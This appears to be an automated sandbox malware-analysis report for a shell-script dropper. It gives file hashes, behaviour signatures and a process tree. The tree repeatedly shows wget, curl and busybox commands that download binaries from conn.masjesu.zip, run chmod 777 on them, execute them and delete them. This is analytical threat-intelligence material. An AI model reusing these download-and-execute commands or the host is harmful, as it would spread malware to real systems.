Analysis
max time kernel
149s
max time network
152s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
-
Size
10KB
-
MD5
95182cb1a6c811823bdbe664fb8ebdf7
-
SHA1
05149e5200d9a87556f3bd0c65e34323d70432a5
-
SHA256
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd
-
SHA512
e4352c11296cd61aa621b235b5b606bd514e11d8ea7f1f0c995d44bffac31476e83638aa6c8f5515f7392ae680fc1be7ad4e62ea026ffe5cb2f063950e6ffa7e
-
SSDEEP
192:sFi6S/T/e2aFgAuWzGciFi6S/TG2aFgAoG:sFi6S/T/NWzhiFi6S/TM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 16 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 49 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
Processes
PID:687  /tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh  cmd: /tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
  PID:688  /bin/rm  cmd: /bin/rm bins.sh
  PID:690  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [System Network Configuration Discovery]
  PID:761  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:793  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [System Network Configuration Discovery]
  PID:794  /bin/chmod  cmd: chmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [File and Directory Permissions Modification]
  PID:795  /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  cmd: ./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl  [Executes dropped EXE]
  PID:796  /bin/rm  cmd: rm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl
  PID:797  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [System Network Configuration Discovery]
  PID:801  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:803  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [System Network Configuration Discovery]
  PID:804  /bin/chmod  cmd: chmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [File and Directory Permissions Modification]
  PID:805  /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  cmd: ./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb  [Executes dropped EXE]
  PID:806  /bin/rm  cmd: rm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb
  PID:807  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [System Network Configuration Discovery]
  PID:808  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:810  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [System Network Configuration Discovery]
  PID:811  /bin/chmod  cmd: chmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [File and Directory Permissions Modification]
  PID:812  /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  cmd: ./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH  [Executes dropped EXE]
  PID:813  /bin/rm  cmd: rm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH
  PID:814  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [System Network Configuration Discovery]
  PID:815  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:817  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [System Network Configuration Discovery]
  PID:818  /bin/chmod  cmd: chmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [File and Directory Permissions Modification]
  PID:819  /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  cmd: ./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI  [Executes dropped EXE]
  PID:820  /bin/rm  cmd: rm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI
  PID:821  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [System Network Configuration Discovery]
  PID:822  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:824  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [System Network Configuration Discovery]
  PID:825  /bin/chmod  cmd: chmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [File and Directory Permissions Modification]
  PID:826  /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  cmd: ./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q  [Executes dropped EXE]
  PID:827  /bin/rm  cmd: rm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q
  PID:828  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [System Network Configuration Discovery]
  PID:829  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:831  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [System Network Configuration Discovery]
  PID:832  /bin/chmod  cmd: chmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [File and Directory Permissions Modification]
  PID:833  /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  cmd: ./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv  [Executes dropped EXE]
  PID:834  /bin/rm  cmd: rm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv
  PID:835  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [System Network Configuration Discovery]
  PID:836  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:838  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [System Network Configuration Discovery]
  PID:839  /bin/chmod  cmd: chmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [File and Directory Permissions Modification]
  PID:840  /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  cmd: ./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K  [Executes dropped EXE]
  PID:841  /bin/rm  cmd: rm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K
  PID:842  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [System Network Configuration Discovery]
  PID:843  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:845  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [System Network Configuration Discovery]
  PID:846  /bin/chmod  cmd: chmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [File and Directory Permissions Modification]
  PID:847  /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  cmd: ./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B  [Executes dropped EXE]
  PID:848  /bin/rm  cmd: rm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B
  PID:849  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  PID:850  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:852  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  PID:853  /bin/chmod  cmd: chmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [File and Directory Permissions Modification]
  PID:854  /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  cmd: ./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Executes dropped EXE]
  PID:855  /bin/rm  cmd: rm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg
  PID:856  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  PID:857  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:859  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  PID:860  /bin/chmod  cmd: chmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [File and Directory Permissions Modification]
  PID:861  /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  cmd: ./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Executes dropped EXE]
  PID:862  /bin/rm  cmd: rm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83
  PID:863  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [System Network Configuration Discovery]
  PID:864  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:866  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [System Network Configuration Discovery]
  PID:867  /bin/chmod  cmd: chmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [File and Directory Permissions Modification]
  PID:868  /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  cmd: ./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [Executes dropped EXE]
  PID:869  /bin/rm  cmd: rm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn
  PID:870  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  [System Network Configuration Discovery]
  PID:871  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:873  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  [System Network Configuration Discovery]
  PID:874  /bin/chmod  cmd: chmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  [File and Directory Permissions Modification]
  PID:875  /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  cmd: ./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr  [Executes dropped EXE]
  PID:876  /bin/rm  cmd: rm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr
  PID:877  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  [System Network Configuration Discovery]
  PID:878  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:880  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  [System Network Configuration Discovery]
  PID:881  /bin/chmod  cmd: chmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  [File and Directory Permissions Modification]
  PID:882  /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  cmd: ./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC  [Executes dropped EXE]
  PID:883  /bin/rm  cmd: rm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC
  PID:884  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  [System Network Configuration Discovery]
  PID:885  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:887  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  [System Network Configuration Discovery]
  PID:888  /bin/chmod  cmd: chmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  [File and Directory Permissions Modification]
  PID:889  /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  cmd: ./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf  [Executes dropped EXE]
  PID:890  /bin/rm  cmd: rm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf
  PID:891  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  PID:892  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:894  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [System Network Configuration Discovery]
  PID:895  /bin/chmod  cmd: chmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [File and Directory Permissions Modification]
  PID:896  /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  cmd: ./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg  [Executes dropped EXE]
  PID:897  /bin/rm  cmd: rm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg
  PID:898  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  PID:899  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID:901  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [System Network Configuration Discovery]
  PID:902  /bin/chmod  cmd: chmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [File and Directory Permissions Modification]
  PID:903  /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  cmd: ./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83  [Executes dropped EXE]
  PID:904  /bin/rm  cmd: rm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83
  PID:905  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn  [System Network Configuration Discovery]
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97